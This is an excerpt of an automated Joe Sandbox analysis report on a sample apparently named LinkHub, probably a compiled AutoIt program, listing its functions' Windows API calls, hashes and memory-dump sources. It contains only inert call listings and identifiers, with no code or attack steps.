                                                                                        • Opcode ID: 25ed12f45ae595a0109f28404b4ea3a1e4286e79f0f9295741c884a64d99d3bd
                                                                                        • Instruction ID: 66700842e130eed1f2872d5002d40ebf3b34754e87573a8225f70e690cd06e30
                                                                                        • Opcode Fuzzy Hash: 25ed12f45ae595a0109f28404b4ea3a1e4286e79f0f9295741c884a64d99d3bd
                                                                                        • Instruction Fuzzy Hash: BBD017BE1B020269EC180E3C9B2FE370D09A302741F82434BF122D5595E4C199A5A621
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0022075E), ref: 00220D4A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: acb7e2d855520e435e573b50f72af4883c72d48cdd9c506f6766e4629a5a0f86
                                                                                        • Instruction ID: de7792b21105290512466cdfb3582e53ded665181da336486e1bf39222861cfa
                                                                                        • Opcode Fuzzy Hash: acb7e2d855520e435e573b50f72af4883c72d48cdd9c506f6766e4629a5a0f86
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 0028358D
                                                                                        • DeleteObject.GDI32(00000000), ref: 002835A0
                                                                                        • DestroyWindow.USER32 ref: 002835AF
                                                                                        • GetDesktopWindow.USER32 ref: 002835CA
                                                                                        • GetWindowRect.USER32(00000000), ref: 002835D1
                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00283700
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0028370E
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283755
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00283761
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0028379D
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837BF
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837D2
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837DD
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 002837E6
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837F5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 002837FE
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283805
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00283810
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283822
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,002A0C04,00000000), ref: 00283838
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00283848
                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0028386E
                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0028388D
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002838AF
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283A9C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        • Opcode ID: c6965ddf0956710ef15e134c7cd3b9dc238f2732420446dca95314e9bf547d4a
                                                                                        • Instruction ID: 0a3b092a61c07e45b8259a49a144ea95ffeeab2914e173d5d6e56bde1b23bd03
                                                                                        • Opcode Fuzzy Hash: c6965ddf0956710ef15e134c7cd3b9dc238f2732420446dca95314e9bf547d4a
                                                                                        • Instruction Fuzzy Hash: 17029A76910209EFDB14DF64DD89EAEBBB9EB48710F008149F915AB2A1CB74AD11CF60
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?), ref: 002016B4
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00242B07
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00242B40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00242F85
                                                                                          • Part of subcall function 00201802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00201488,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 00201865
                                                                                        • SendMessageW.USER32(?,00001053), ref: 00242FC1
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00242FD8
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00242FEE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00242FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                        • String ID: 0$(-$(-$(-
                                                                                        • API String ID: 2760611726-2868662787
                                                                                        • Opcode ID: 47f8c9dbfd0c55e36e428ad76d3f4f59b2ae038521a22eb0a72f84f5e759cd73
                                                                                        • Instruction ID: e0ae2fd51caddd080af52bbd51138f43d074e2f5e8f53399df2973dc1c92c997
                                                                                        • Opcode Fuzzy Hash: 47f8c9dbfd0c55e36e428ad76d3f4f59b2ae038521a22eb0a72f84f5e759cd73
                                                                                        • Instruction Fuzzy Hash: 2B12C230621242DFC729CF15D898BA9B7F5FB44300F98456AF4459B262C732ECAADF91
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00297B67
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00297B98
                                                                                        • GetSysColor.USER32(0000000F), ref: 00297BA4
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00297BBE
                                                                                        • SelectObject.GDI32(?,?), ref: 00297BCD
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00297BF8
                                                                                        • GetSysColor.USER32(00000010), ref: 00297C00
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00297C07
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00297C16
                                                                                        • DeleteObject.GDI32(00000000), ref: 00297C1D
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00297C68
                                                                                        • FillRect.USER32(?,?,?), ref: 00297C9A
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00297CBC
                                                                                          • Part of subcall function 00297E22: GetSysColor.USER32(00000012), ref: 00297E5B
                                                                                          • Part of subcall function 00297E22: SetTextColor.GDI32(?,00297B2D), ref: 00297E5F
                                                                                          • Part of subcall function 00297E22: GetSysColorBrush.USER32(0000000F), ref: 00297E75
                                                                                          • Part of subcall function 00297E22: GetSysColor.USER32(0000000F), ref: 00297E80
                                                                                          • Part of subcall function 00297E22: GetSysColor.USER32(00000011), ref: 00297E9D
                                                                                          • Part of subcall function 00297E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00297EAB
                                                                                          • Part of subcall function 00297E22: SelectObject.GDI32(?,00000000), ref: 00297EBC
                                                                                          • Part of subcall function 00297E22: SetBkColor.GDI32(?,?), ref: 00297EC5
                                                                                          • Part of subcall function 00297E22: SelectObject.GDI32(?,?), ref: 00297ED2
                                                                                          • Part of subcall function 00297E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00297EF1
                                                                                          • Part of subcall function 00297E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00297F08
                                                                                          • Part of subcall function 00297E22: GetWindowLongW.USER32(?,000000F0), ref: 00297F15
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                        • String ID:
                                                                                        • API String ID: 4124339563-0
                                                                                        • Opcode ID: cbcba472510d749119f37e0c21443751840bea8b54213c08c5b98d7cd1830024
                                                                                        • Instruction ID: 02e2875347081523b6663c381a36fa4af970dad854bcb4f78ced48597a2f5054
                                                                                        • Opcode Fuzzy Hash: cbcba472510d749119f37e0c21443751840bea8b54213c08c5b98d7cd1830024
                                                                                        • Instruction Fuzzy Hash: B3A19C72028302AFCB109F64EC4CE6BBBA9FF48324F500A1AFA66961E0D771D954DB51
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 0028319B
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002832C7
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00283306
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00283316
                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0028335D
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00283369
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002833B2
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002833C1
                                                                                        • GetStockObject.GDI32(00000011), ref: 002833D1
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002833D5
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002833E5
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002833EE
                                                                                        • DeleteDC.GDI32(00000000), ref: 002833F7
                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00283423
                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0028343A
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0028347A
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0028348E
                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0028349F
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002834D4
                                                                                        • GetStockObject.GDI32(00000011), ref: 002834DF
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002834EA
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002834F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-517079104
                                                                                        • Opcode ID: 3866d04a2187966d9913a3e112f466be3f61af2badd9bc2b052ddf563f7fdab9
                                                                                        • Instruction ID: 5d86650380edcc567e0c06e37edda75001f413b4de72ecf8c405bf380d03f53a
                                                                                        • Opcode Fuzzy Hash: 3866d04a2187966d9913a3e112f466be3f61af2badd9bc2b052ddf563f7fdab9
                                                                                        • Instruction Fuzzy Hash: C7B16CB1A11205AFEB14DFA8DC49FAEBBB9EB08710F008155FA15E72D1D774AD10CBA0
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00275532
                                                                                        • GetDriveTypeW.KERNEL32(?,0029DC30,?,\\.\,0029DCD0), ref: 0027560F
                                                                                        • SetErrorMode.KERNEL32(00000000,0029DC30,?,\\.\,0029DCD0), ref: 0027577B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: b6b9e458037ac3ebd211adb3edd5f0c4923566abda7377ee8b1938878434f107
                                                                                        • Instruction ID: 571751eeb5965dad7a44aff783d8f18611993aa3cb2b3bb5582caabfc93fa64e
                                                                                        • Opcode Fuzzy Hash: b6b9e458037ac3ebd211adb3edd5f0c4923566abda7377ee8b1938878434f107
                                                                                        • Instruction Fuzzy Hash: DF61AE30A74A56DBC728DF24C991E78F3A1AF15350B24C11AE40EAB291CBF19D71DF51
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002025F8
• GetSystemMetrics.USER32(00000007), ref: 00202600
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0020262B
• GetSystemMetrics.USER32(00000008), ref: 00202633
• GetSystemMetrics.USER32(00000004), ref: 00202658
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00202675
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00202685
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002026B8
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002026CC
• GetClientRect.USER32(00000000,000000FF), ref: 002026EA
• GetStockObject.GDI32(00000011), ref: 00202706
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00202711
  • Part of subcall function 002019CD: GetCursorPos.USER32(?), ref: 002019E1
  • Part of subcall function 002019CD: ScreenToClient.USER32(00000000,?), ref: 002019FE
  • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000001), ref: 00201A23
  • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000002), ref: 00201A3D
• SetTimer.USER32(00000000,00000000,00000028,0020199C), ref: 00202738
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: <)-$<)-$AutoIt v3 GUI$(-$(-$(-
• API String ID: 1458621304-2643633994
• Opcode ID: 390b932cfe2e225b0cdeeee454a0e9efbba9d9897dbb82e6f569a3597edcdef6
• Instruction ID: 47560ea30be9024098f591dfa6cdd2020768ecc8a58e8269a68b15e6dacd2168
• Opcode Fuzzy Hash: 390b932cfe2e225b0cdeeee454a0e9efbba9d9897dbb82e6f569a3597edcdef6
• Instruction Fuzzy Hash: 8FB15931A1020ADFDB18DFA8DC99BAA7BB4FB48314F10421AFA15A72D0C770A965DF54
APIs
• GetCursorPos.USER32(?), ref: 00291BC4
• GetDesktopWindow.USER32 ref: 00291BD9
• GetWindowRect.USER32(00000000), ref: 00291BE0
• GetWindowLongW.USER32(?,000000F0), ref: 00291C35
• DestroyWindow.USER32(?), ref: 00291C55
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00291C89
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00291CA7
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00291CB9
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00291CCE
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00291CE1
• IsWindowVisible.USER32(00000000), ref: 00291D3D
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00291D58
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00291D6C
• GetWindowRect.USER32(00000000,?), ref: 00291D84
• MonitorFromPoint.USER32(?,?,00000002), ref: 00291DAA
• GetMonitorInfoW.USER32(00000000,?), ref: 00291DC4
• CopyRect.USER32(?,?), ref: 00291DDB
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00291E46
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: db36faf05d4b27d9bc5b3374977f0ea4317f8a7d5a9f80b4d2859c75f6a5ff86
• Instruction ID: 87f728d3d76e2102806d4a0d3a50195ec240db5019d74b6c03f218d157c69047
• Opcode Fuzzy Hash: db36faf05d4b27d9bc5b3374977f0ea4317f8a7d5a9f80b4d2859c75f6a5ff86
• Instruction Fuzzy Hash: 31B1AE71614302AFDB14DF65D984B6ABBE5FF84310F00891DF9999B291C731E864CFA2
APIs
• CharUpperBuffW.USER32(?,?), ref: 00290D81
• _wcslen.LIBCMT ref: 00290DBB
• _wcslen.LIBCMT ref: 00290E25
• _wcslen.LIBCMT ref: 00290E8D
• _wcslen.LIBCMT ref: 00290F11
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00290F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00290FA0
  • Part of subcall function 0021FD52: _wcslen.LIBCMT ref: 0021FD5D
  • Part of subcall function 00262B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00262BA5
  • Part of subcall function 00262B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00262BD7
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: 659634f5db0a957a223383257ddd80d61917aa204c08ce5c774e625c96431c04
• Instruction ID: eb45fb047fb1ea0815ce72b1c480225f00cd6e7e4577d3d6e6515b362e598400
• Opcode Fuzzy Hash: 659634f5db0a957a223383257ddd80d61917aa204c08ce5c774e625c96431c04
• Instruction Fuzzy Hash: 91E1D0312283068FCB14DF24C99097AB3E5BF98314B148A2DF896977A2CB31ED65CB51
APIs
  • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261A60
  • Part of subcall function 00261A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A6C
  • Part of subcall function 00261A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A7B
  • Part of subcall function 00261A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A82
  • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00261A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00261741
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00261775
• GetLengthSid.ADVAPI32(?), ref: 0026178C
• GetAce.ADVAPI32(?,00000000,?), ref: 002617C6
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002617E2
• GetLengthSid.ADVAPI32(?), ref: 002617F9
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00261801
• HeapAlloc.KERNEL32(00000000), ref: 00261808
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00261829
• CopySid.ADVAPI32(00000000), ref: 00261830
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0026185F
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00261881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00261893
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002618BA
• HeapFree.KERNEL32(00000000), ref: 002618C1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002618CA
• HeapFree.KERNEL32(00000000), ref: 002618D1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002618DA
• HeapFree.KERNEL32(00000000), ref: 002618E1
• GetProcessHeap.KERNEL32(00000000,?), ref: 002618ED
• HeapFree.KERNEL32(00000000), ref: 002618F4
  • Part of subcall function 00261ADF: GetProcessHeap.KERNEL32(00000008,002614FD,?,00000000,?,002614FD,?), ref: 00261AED
  • Part of subcall function 00261ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002614FD,?), ref: 00261AF4
  • Part of subcall function 00261ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002614FD,?), ref: 00261B03
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: eb20bd7b282f84961fe3e336c2916829c64ae324c407253cc6ca07f01cbf33e0
• Instruction ID: e309cc01db9b955f24c2807838c0066719fc7ae14e7bee501c14cfd297abed95
• Opcode Fuzzy Hash: eb20bd7b282f84961fe3e336c2916829c64ae324c407253cc6ca07f01cbf33e0
• Instruction Fuzzy Hash: FF714E72D1020AAFEF10DFA5EC49FAEBBB8BF44350F184125F915A7190D731AA65CB60
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028CF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0029DCD0,00000000,?,00000000,?,?), ref: 0028CFA4
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0028D004
• _wcslen.LIBCMT ref: 0028D054
• _wcslen.LIBCMT ref: 0028D0CF
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0028D112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0028D221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0028D2AD
• RegCloseKey.ADVAPI32(?), ref: 0028D2E1
• RegCloseKey.ADVAPI32(00000000), ref: 0028D2EE
